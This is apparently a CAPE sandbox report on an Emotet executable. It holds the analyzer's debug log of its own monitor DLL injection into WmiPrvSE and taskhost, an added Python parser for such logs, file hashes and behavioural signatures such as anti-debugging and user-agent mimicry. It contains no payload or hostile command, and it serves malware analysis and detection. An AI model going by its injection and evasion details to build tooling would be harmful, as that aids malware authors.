2019-10-10 02:02:55,484 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-10-10 02:02:55,609 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-10-10 02:02:55,609 [root] DEBUG: DLL loaded at 0x000007FEFEDB0000: C:\Windows\system32\OLEAUT32 (0xd7000 bytes).
2019-10-10 02:02:55,671 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1420.
2019-10-10 02:02:55,687 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:02:55,766 [root] DEBUG: DLL loaded at 0x000007FEF80B0000: c:\windows\system32\wbem\wmisvc (0x40000 bytes).
2019-10-10 02:02:55,782 [root] DEBUG: DLL loaded at 0x000007FEF9D90000: C:\Windows\system32\wbemcomn (0x86000 bytes).
2019-10-10 02:02:55,796 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-10-10 02:02:55,812 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2019-10-10 02:02:55,859 [root] DEBUG: DLL unloaded from 0x000007FEF80B0000.
2019-10-10 02:02:55,875 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-10-10 02:02:56,030 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-10-10 02:02:56,046 [root] DEBUG: DLL loaded at 0x000007FEFD000000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2019-10-10 02:02:56,062 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1132.
2019-10-10 02:02:56,094 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:02:57,342 [root] DEBUG: DLL loaded at 0x000007FEF9E80000: C:\Windows\system32\VSSAPI (0x1b0000 bytes).
2019-10-10 02:02:57,357 [root] DEBUG: DLL loaded at 0x000007FEFB270000: C:\Windows\system32\ATL (0x19000 bytes).
2019-10-10 02:02:57,372 [root] DEBUG: DLL loaded at 0x000007FEF9E60000: C:\Windows\system32\VssTrace (0x17000 bytes).
2019-10-10 02:02:57,404 [root] DEBUG: DLL loaded at 0x000007FEFA870000: C:\Windows\system32\samcli (0x14000 bytes).
2019-10-10 02:02:57,420 [root] DEBUG: DLL loaded at 0x000007FEFB820000: C:\Windows\system32\SAMLIB (0x1d000 bytes).
2019-10-10 02:02:57,434 [root] DEBUG: DLL loaded at 0x000007FEFAC20000: C:\Windows\system32\netutils (0xc000 bytes).
2019-10-10 02:02:57,450 [root] DEBUG: DLL loaded at 0x000007FEFB0D0000: C:\Windows\system32\es (0x67000 bytes).
2019-10-10 02:02:57,529 [root] DEBUG: DLL loaded at 0x000007FEFB840000: C:\Windows\system32\PROPSYS (0x12c000 bytes).
2019-10-10 02:02:57,575 [root] DEBUG: DLL loaded at 0x000007FEF9540000: C:\Windows\system32\wbem\wbemcore (0x12f000 bytes).
2019-10-10 02:02:57,638 [root] DEBUG: DLL loaded at 0x000007FEF94D0000: C:\Windows\system32\wbem\esscli (0x6f000 bytes).
2019-10-10 02:02:57,654 [root] DEBUG: DLL loaded at 0x000007FEF9A00000: C:\Windows\system32\wbem\FastProx (0xe2000 bytes).
2019-10-10 02:02:57,668 [root] DEBUG: DLL loaded at 0x000007FEF9980000: C:\Windows\system32\NTDSAPI (0x27000 bytes).
2019-10-10 02:02:57,684 [root] DEBUG: DLL unloaded from 0x000007FEF9540000.
2019-10-10 02:02:57,700 [root] DEBUG: DLL unloaded from 0x000007FEF80B0000.
2019-10-10 02:02:57,700 [root] DEBUG: DLL loaded at 0x000007FEFA0A0000: C:\Windows\system32\wbem\wbemsvc (0x14000 bytes).
2019-10-10 02:02:57,732 [root] INFO: Started WMI Service
2019-10-10 02:02:57,732 [root] DEBUG: DLL loaded at 0x000007FEFCAC0000: C:\Windows\system32\authZ (0x2f000 bytes).
2019-10-10 02:02:57,732 [root] INFO: Attaching to WMI service (pid 1544)
2019-10-10 02:02:57,746 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:02:57,763 [lib.api.process] INFO: 64-bit DLL to inject is C:\esgppejl\dll\pZBYujCR.dll, loader C:\esgppejl\bin\DryJIDvq.exe
2019-10-10 02:02:57,763 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2548.
2019-10-10 02:02:57,778 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:02:57,778 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:02:57,809 [root] DEBUG: DLL loaded at 0x000007FEF97C0000: C:\Windows\system32\wbem\wmiutils (0x26000 bytes).
2019-10-10 02:02:57,809 [root] DEBUG: Loader: Injecting process 1544 (thread 0) with C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:02:57,825 [root] DEBUG: DLL loaded at 0x000007FEF90B0000: C:\Windows\system32\wbem\repdrvfs (0x73000 bytes).
2019-10-10 02:02:57,825 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2368, handle 0x84
2019-10-10 02:02:57,841 [root] DEBUG: Process image base: 0x00000000FFA10000
2019-10-10 02:02:57,855 [root] WARNING: File at path "C:\Windows\sysnative\wbem\repository\WRITABLE.TST" does not exist, skip.
2019-10-10 02:02:57,855 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-10-10 02:02:57,871 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-10-10 02:02:57,888 [root] DEBUG: DLL loaded at 0x000007FEFCB00000: C:\Windows\system32\Wevtapi (0x6d000 bytes).
2019-10-10 02:02:57,918 [root] DEBUG: set_caller_info: Adding region at 0x0000000001FB0000 to caller regions list.
2019-10-10 02:02:57,918 [root] DEBUG: DLL unloaded from 0x000007FEFCB00000.
2019-10-10 02:02:57,934 [root] DEBUG: DLL loaded at 0x0000000002C50000: C:\esgppejl\dll\pZBYujCR (0xe3000 bytes).
2019-10-10 02:02:57,950 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-10-10 02:02:57,966 [root] DEBUG: DLL unloaded from 0x0000000002C50000.
2019-10-10 02:02:58,105 [root] DEBUG: Error 998 (0x3e6) - InjectDllViaThread: RtlCreateUserThread injection failed: Invalid access to memory location.
2019-10-10 02:02:58,323 [root] DEBUG: InjectDll: DLL injection via thread failed.
2019-10-10 02:02:58,323 [root] DEBUG: Failed to inject DLL C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:02:58,371 [lib.api.process] ERROR: Unable to inject into 64-bit process with pid 1544, error: -8
2019-10-10 02:02:58,387 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2019-10-10 02:02:58,558 [root] DEBUG: DLL loaded at 0x000007FEF80F0000: C:\Windows\system32\wbem\wmiprvsd (0xbc000 bytes).
2019-10-10 02:02:58,683 [root] DEBUG: DLL loaded at 0x000007FEFA0C0000: C:\Windows\system32\NCObjAPI (0x16000 bytes).
2019-10-10 02:02:58,713 [root] DEBUG: DLL loaded at 0x000007FEF6080000: C:\Windows\system32\wbem\wbemess (0x7e000 bytes).
2019-10-10 02:02:58,746 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2932.
2019-10-10 02:02:58,746 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:02:58,963 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1396.
2019-10-10 02:02:59,135 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-10-10 02:02:59,181 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1860.
2019-10-10 02:02:59,259 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:02:59,276 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2216.
2019-10-10 02:02:59,276 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2532.
2019-10-10 02:02:59,369 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1756.
2019-10-10 02:02:59,401 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2660.
2019-10-10 02:02:59,415 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2180.
2019-10-10 02:02:59,431 [root] DEBUG: CreateThread: Initialising breakpoints for thread 836.
2019-10-10 02:02:59,526 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1720.
2019-10-10 02:02:59,727 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2812.
2019-10-10 02:03:00,648 [root] INFO: Announced 64-bit process name: WmiPrvSE.exe pid: 552
2019-10-10 02:03:00,710 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:03:00,710 [lib.api.process] INFO: 64-bit DLL to inject is C:\esgppejl\dll\pZBYujCR.dll, loader C:\esgppejl\bin\DryJIDvq.exe
2019-10-10 02:03:00,805 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:03:00,867 [root] DEBUG: Loader: Injecting process 552 (thread 736) with C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:03:00,882 [root] DEBUG: Process image base: 0x00000000FF670000
2019-10-10 02:03:00,898 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:03:00,914 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FF6CF000 - 0x000007FEFF430000
2019-10-10 02:03:00,992 [root] DEBUG: InjectDllViaIAT: Allocated 0x238 bytes for new import table at 0x00000000FF6D0000.
2019-10-10 02:03:00,992 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 02:03:01,101 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:03:01,101 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 552
2019-10-10 02:03:01,101 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:03:01,538 [root] DEBUG: Process dumps disabled.
2019-10-10 02:03:01,756 [root] DEBUG: DLL loaded at 0x000007FEFB060000: C:\Windows\system32\wbem\ncprov (0x16000 bytes).
2019-10-10 02:03:02,068 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1236.
2019-10-10 02:03:02,084 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1836.
2019-10-10 02:03:02,645 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1432.
2019-10-10 02:03:07,293 [root] INFO: Disabling sleep skipping.
2019-10-10 02:03:07,293 [root] DEBUG: DLL unloaded from 0x74D10000.
2019-10-10 02:03:07,309 [root] WARNING: Unable to place hook on LockResource
2019-10-10 02:03:07,309 [root] WARNING: Unable to hook LockResource
2019-10-10 02:03:07,434 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-10-10 02:03:07,434 [root] DEBUG: DLL unloaded from 0x75600000.
2019-10-10 02:03:07,434 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 02:03:07,450 [root] DEBUG: Debugger initialised.
2019-10-10 02:03:07,496 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 552 at 0x00000000741B0000, image base 0x00000000FF670000, stack from 0x0000000000260000-0x0000000000270000
2019-10-10 02:03:07,496 [root] DEBUG: Commandline: C:\Windows\sysnative\wbem\wmiprvse.exe -Embedding.
2019-10-10 02:03:07,887 [root] DEBUG: AddTrackedRegion: EntryPoint 0xa9b4, Entropy 5.872102e+00
2019-10-10 02:03:07,887 [root] DEBUG: AddTrackedRegion: Region at 0x00000000FF670000 size 0x1000 added to tracked regions.
2019-10-10 02:03:08,121 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:03:08,137 [root] INFO: Added new process to list with pid: 552
2019-10-10 02:03:08,137 [root] INFO: Monitor successfully loaded in process with pid 552.
2019-10-10 02:03:08,339 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-10-10 02:03:08,355 [root] DEBUG: DLL loaded at 0x000007FEFC190000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-10-10 02:03:08,433 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-10-10 02:03:08,744 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-10-10 02:03:08,744 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2708.
2019-10-10 02:03:08,808 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:03:08,869 [root] DEBUG: DLL loaded at 0x000007FEF9D50000: C:\Windows\system32\wbem\wbemprox (0xf000 bytes).
2019-10-10 02:03:08,869 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2524.
2019-10-10 02:03:08,979 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-10-10 02:03:08,994 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-10-10 02:03:09,056 [root] DEBUG: DLL loaded at 0x000007FEFD000000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2019-10-10 02:03:09,243 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2516.
2019-10-10 02:03:11,599 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-10-10 02:03:18,651 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-10-10 02:03:21,099 [root] DEBUG: DLL unloaded from 0x000007FEF7210000.
2019-10-10 02:03:49,351 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-10-10 02:03:55,279 [root] INFO: Announced 64-bit process name: taskhost.exe pid: 2344
2019-10-10 02:04:13,250 [root] DEBUG: DLL loaded at 0x000007FEFA1D0000: C:\Windows\System32\wscinterop (0x28000 bytes).
2019-10-10 02:04:22,128 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2019-10-10 02:04:22,142 [root] DEBUG: DLL loaded at 0x000007FEF9C40000: C:\Windows\System32\WSCAPI (0x13000 bytes).
2019-10-10 02:04:22,206 [lib.api.process] INFO: 64-bit DLL to inject is C:\esgppejl\dll\pZBYujCR.dll, loader C:\esgppejl\bin\DryJIDvq.exe
2019-10-10 02:04:22,315 [root] DEBUG: DLL loaded at 0x000007FEF7290000: C:\Windows\System32\wscui.cpl (0x11f000 bytes).
2019-10-10 02:04:22,424 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\eKzZugK.
2019-10-10 02:04:22,440 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9C40000 to caller regions list.
2019-10-10 02:04:22,565 [root] DEBUG: Loader: Injecting process 2344 (thread 2564) with C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:04:22,611 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA1D0000 to caller regions list.
2019-10-10 02:04:22,704 [root] DEBUG: Process image base: 0x00000000FFC30000
2019-10-10 02:04:22,799 [root] DEBUG: DLL loaded at 0x000007FEF5250000: C:\Windows\System32\werconcpl (0x13c000 bytes).
2019-10-10 02:04:22,861 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:04:22,877 [root] DEBUG: DLL unloaded from 0x000007FEF9540000.
2019-10-10 02:04:22,877 [root] DEBUG: DLL loaded at 0x000007FEFA0A0000: C:\Windows\system32\wbem\wbemsvc (0x14000 bytes).
2019-10-10 02:04:22,877 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FFC44000 - 0x000007FEFF430000
2019-10-10 02:04:22,877 [root] DEBUG: DLL loaded at 0x000007FEF9900000: C:\Windows\System32\framedynos (0x4c000 bytes).
2019-10-10 02:04:22,877 [root] DEBUG: InjectDllViaIAT: Allocated 0x238 bytes for new import table at 0x00000000FFC50000.
2019-10-10 02:04:22,877 [root] DEBUG: DLL loaded at 0x000007FEF8090000: C:\Windows\System32\wercplsupport (0x19000 bytes).
2019-10-10 02:04:22,877 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 02:04:22,891 [root] DEBUG: Successfully injected DLL C:\esgppejl\dll\pZBYujCR.dll.
2019-10-10 02:04:22,891 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2344
2019-10-10 02:04:22,891 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 02:04:22,891 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9900000 to caller regions list.
2019-10-10 02:04:22,891 [root] DEBUG: Process dumps disabled.
2019-10-10 02:04:22,907 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF8090000 to caller regions list.
2019-10-10 02:04:22,907 [root] INFO: Disabling sleep skipping.
2019-10-10 02:04:22,923 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF5250000 to caller regions list.
2019-10-10 02:04:22,923 [root] WARNING: Unable to place hook on LockResource
2019-10-10 02:04:22,923 [root] WARNING: Unable to hook LockResource
2019-10-10 02:04:22,923 [root] DEBUG: DLL loaded at 0x000007FEF8390000: C:\Windows\System32\msxml6 (0x1f2000 bytes).
2019-10-10 02:04:22,938 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 02:04:22,938 [root] DEBUG: Debugger initialised.
2019-10-10 02:04:22,938 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 2344 at 0x00000000741B0000, image base 0x00000000FFC30000, stack from 0x0000000000215000-0x0000000000220000
2019-10-10 02:04:22,938 [root] DEBUG: Commandline: C:\Windows\sysnative\"taskhost.exe".
2019-10-10 02:04:22,938 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF8390000 to caller regions list.
2019-10-10 02:04:22,954 [root] DEBUG: AddTrackedRegion: EntryPoint 0x2ce0, Entropy 5.003625e+00
2019-10-10 02:04:22,954 [root] DEBUG: AddTrackedRegion: Region at 0x00000000FFC30000 size 0x1000 added to tracked regions.
2019-10-10 02:04:22,954 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2019-10-10 02:04:22,970 [root] DEBUG: DLL loaded at 0x000007FEFA1C0000: C:\Windows\System32\hcproviders (0xb000 bytes).
2019-10-10 02:04:22,970 [root] INFO: Added new process to list with pid: 2344
2019-10-10 02:04:22,970 [root] INFO: Monitor successfully loaded in process with pid 2344.
2019-10-10 02:04:22,970 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-10-10 02:04:22,970 [root] DEBUG: CreateThread: Initialising breakpoints for thread 3036.
2019-10-10 02:04:22,970 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:04:22,986 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA1C0000 to caller regions list.
2019-10-10 02:04:23,016 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2448.
2019-10-10 02:04:37,509 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1304.
2019-10-10 02:04:37,509 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-10-10 02:04:37,525 [root] DEBUG: DLL loaded at 0x000007FEFA040000: C:\Windows\System32\wdi (0x19000 bytes).
2019-10-10 02:04:43,328 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:04:49,240 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1428.
2019-10-10 02:04:49,240 [root] DEBUG: DLL loaded at 0x000007FEF97C0000: C:\Windows\system32\wbem\wmiutils (0x26000 bytes).
2019-10-10 02:04:49,256 [root] DEBUG: DLL loaded at 0x000007FEF8070000: C:\Windows\system32\radarrs (0x18000 bytes).
2019-10-10 02:04:49,286 [root] DEBUG: DLL loaded at 0x000007FEFBB00000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\COMCTL32 (0x1f4000 bytes).
2019-10-10 02:05:01,220 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\SHELL32 (0xd88000 bytes).
2019-10-10 02:05:01,220 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2796.
2019-10-10 02:05:01,267 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2424.
2019-10-10 02:05:07,243 [root] DEBUG: DLL loaded at 0x000007FEF7440000: C:\Windows\system32\RstrtMgr (0x33000 bytes).
2019-10-10 02:05:07,243 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:05:07,243 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-10-10 02:05:13,249 [root] DEBUG: DLL loaded at 0x000007FEFCA70000: C:\Windows\system32\ncrypt (0x4e000 bytes).
2019-10-10 02:05:19,223 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-10-10 02:05:19,239 [root] DEBUG: DLL loaded at 0x000007FEFCA40000: C:\Windows\system32\bcrypt (0x22000 bytes).
2019-10-10 02:05:23,092 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-10-10 02:05:23,108 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2408.
2019-10-10 02:05:23,108 [root] DEBUG: DLL loaded at 0x000007FEF8CA0000: C:\Windows\system32\wer (0x7c000 bytes).
2019-10-10 02:05:23,138 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\VERSION (0xc000 bytes).
2019-10-10 02:05:35,308 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:05:35,308 [root] DEBUG: DLL unloaded from 0x00000000FFC30000.
2019-10-10 02:05:41,328 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-10-10 02:05:53,325 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1856.
2019-10-10 02:05:53,325 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:05:53,341 [root] DEBUG: DLL loaded at 0x000007FEF7400000: C:\Windows\system32\wbem\wmiprov (0x3c000 bytes).
2019-10-10 02:05:53,404 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1992.
2019-10-10 02:05:53,404 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:05:53,450 [root] DEBUG: DLL unloaded from 0x000007FEFB0D0000.
2019-10-10 02:05:55,056 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2288.
2019-10-10 02:05:55,056 [root] DEBUG: DLL unloaded from 0x0000000077110000.
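The analyzer log above is what the CAPE monitor emits line by line while it follows the sample into other processes: DLL loads and unloads by base address, regions the Extraction package starts tracking (with the entropy it measures at the entry point), and threads it installs breakpoints in. To make such a log queryable rather than scrolled, here is an added Python parser that reconstructs that state. It is example code written for this page, not part of CAPE or of this report; the line regexes are assumptions derived only from the lines visible here, and the embedded sample is a dozen lines copied verbatim from the log above.

```python
"""Parse CAPE analyzer log lines into per-process state (added example, not CAPE code)."""
import re
from dataclasses import dataclass, field

# "<date> <time>,<ms> [<logger>] <LEVEL>: <message>" -- format assumed from the log above.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}) "
    r"\[(?P<logger>[^\]]+)\] (?P<level>[A-Z]+): (?P<msg>.*)$"
)
DLL_LOAD_RE = re.compile(
    r"^DLL loaded at 0x(?P<base>[0-9A-Fa-f]+): (?P<path>.+?) \(0x(?P<size>[0-9A-Fa-f]+) bytes\)\.$"
)
DLL_UNLOAD_RE = re.compile(r"^DLL unloaded from 0x(?P<base>[0-9A-Fa-f]+)\.$")
ENTROPY_RE = re.compile(
    r"^AddTrackedRegion: EntryPoint 0x(?P<ep>[0-9A-Fa-f]+), Entropy (?P<ent>[0-9.eE+-]+)$"
)
REGION_RE = re.compile(
    r"^AddTrackedRegion: Region at 0x(?P<base>[0-9A-Fa-f]+) size 0x(?P<size>[0-9A-Fa-f]+) added"
)
THREAD_RE = re.compile(r"^CreateThread: Initialising breakpoints for thread (?P<tid>\d+)\.$")
PID_RE = re.compile(r"^Monitor successfully loaded in process with pid (?P<pid>\d+)\.$")


@dataclass
class AnalysisState:
    pids: list = field(default_factory=list)          # processes the monitor loaded into
    threads: list = field(default_factory=list)       # threads that got breakpoints
    loaded: dict = field(default_factory=dict)        # base -> (path, size), still mapped
    regions: list = field(default_factory=list)       # tracked regions with entry point / entropy
    region_unloads: list = field(default_factory=list)   # unload of a base that is a tracked region
    unload_unknown: list = field(default_factory=list)   # unload of a base never seen loaded
    unparsed: int = 0                                 # lines that did not match LINE_RE


def parse_log(lines):
    st = AnalysisState()
    pending = None  # (entry_point, entropy) waiting for the "Region at" line that follows it
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            st.unparsed += 1
            continue
        msg = m["msg"]
        if d := DLL_LOAD_RE.match(msg):
            st.loaded[int(d["base"], 16)] = (d["path"], int(d["size"], 16))
        elif d := DLL_UNLOAD_RE.match(msg):
            base = int(d["base"], 16)
            if base in st.loaded:
                del st.loaded[base]
            elif any(r["base"] == base for r in st.regions):
                st.region_unloads.append(base)
            else:
                # Loaded before this excerpt starts (or never logged): report, don't drop.
                st.unload_unknown.append(base)
        elif d := ENTROPY_RE.match(msg):
            pending = (int(d["ep"], 16), float(d["ent"]))
        elif d := REGION_RE.match(msg):
            ep, ent = pending if pending else (None, None)
            st.regions.append({"base": int(d["base"], 16), "size": int(d["size"], 16),
                               "entry_point": ep, "entropy": ent})
            pending = None
        elif d := THREAD_RE.match(msg):
            st.threads.append(int(d["tid"]))
        elif d := PID_RE.match(msg):
            st.pids.append(int(d["pid"]))
    return st


def summary(st):
    """Compact view: module names sorted by base address, plus the anomalies worth a look."""
    return {
        "pids": st.pids,
        "threads": st.threads,
        "mapped_modules": [m[0].rsplit("\\", 1)[-1] for _, m in sorted(st.loaded.items())],
        "tracked_regions": st.regions,
        "unloads_of_tracked_regions": [hex(b) for b in st.region_unloads],
        "unloads_without_matching_load": sorted({hex(b) for b in st.unload_unknown}),
        "unparsed_lines": st.unparsed,
    }


# Constructed sample: twelve lines copied verbatim from the analyzer log above.
SAMPLE_LOG = r"""
2019-10-10 02:04:22,954 [root] DEBUG: AddTrackedRegion: EntryPoint 0x2ce0, Entropy 5.003625e+00
2019-10-10 02:04:22,954 [root] DEBUG: AddTrackedRegion: Region at 0x00000000FFC30000 size 0x1000 added to tracked regions.
2019-10-10 02:04:22,970 [root] DEBUG: DLL loaded at 0x000007FEFA1C0000: C:\Windows\System32\hcproviders (0xb000 bytes).
2019-10-10 02:04:22,970 [root] INFO: Monitor successfully loaded in process with pid 2344.
2019-10-10 02:04:22,970 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-10-10 02:04:22,970 [root] DEBUG: CreateThread: Initialising breakpoints for thread 3036.
2019-10-10 02:04:22,970 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:04:23,016 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2448.
2019-10-10 02:05:13,249 [root] DEBUG: DLL loaded at 0x000007FEFCA70000: C:\Windows\system32\ncrypt (0x4e000 bytes).
2019-10-10 02:05:19,239 [root] DEBUG: DLL loaded at 0x000007FEFCA40000: C:\Windows\system32\bcrypt (0x22000 bytes).
2019-10-10 02:05:35,308 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:05:35,308 [root] DEBUG: DLL unloaded from 0x00000000FFC30000.
"""


def parse_sample():
    return parse_log(SAMPLE_LOG.strip().splitlines())


if __name__ == "__main__":
    for key, value in summary(parse_sample()).items():
        print(f"{key}: {value}")
```

Unloads are reconciled by base address on purpose: an unload whose base was never seen loaded (0x77110000 in this excerpt, mapped before these lines begin) is reported instead of silently dropped, and an unload of a base the Extraction package had added as a tracked region (0xFFC30000 here) is listed separately, since that is the region whose dump you would go looking for in the CAPE output.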

MalScore

10.0

Emotet

Machine

Name target-01
Label target-01
Manager ESX
Started On 2019-10-10 01:01:37
Shutdown On 2019-10-10 01:06:15

File Details

File Name ygg9ytft62s5ip.exe
File Size 624643 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0efd85b3915d9618f91979e65e520478
SHA1 e70ff18b0f850df07c81c168437f78d51c679625
SHA256 a1d4243b1e2380d5fc9d26ea036bd00c39f09cdcdfc1a3d2b699b5fc15cf29a0
SHA512 41601f2bafff43599da6e50b07952f743669e7cafabebcc1b1caf441c89425814c22b5094fe1bc72bc414c0c3f1024fbfaa54688cfc0c39c1f016a71d609ac42
CRC32 E6EF58FC
Ssdeep 6144:89b9SO5dVdRQ/vqkg1gEagdQHiQSzPgAJ76KkWv:8fBV7uikFgCShJkQ
TrID
  • 41.0% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
  • 36.3% (.EXE) Win64 Executable (generic) (27625/18/4)
  • 8.6% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 5.9% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 2.6% (.EXE) OS/2 Executable (generic) (2029/13)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Behavioural detection: Executable code extraction
At least one process apparently crashed during execution
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 1964 triggered the Yara rule 'Emotet'
Possible date expiration check, exits too soon after checking local time
process: prepmspterm.exe, PID 2128
Mimics the system's user agent string for its own requests
Guard page use detected (possible anti-debugging).
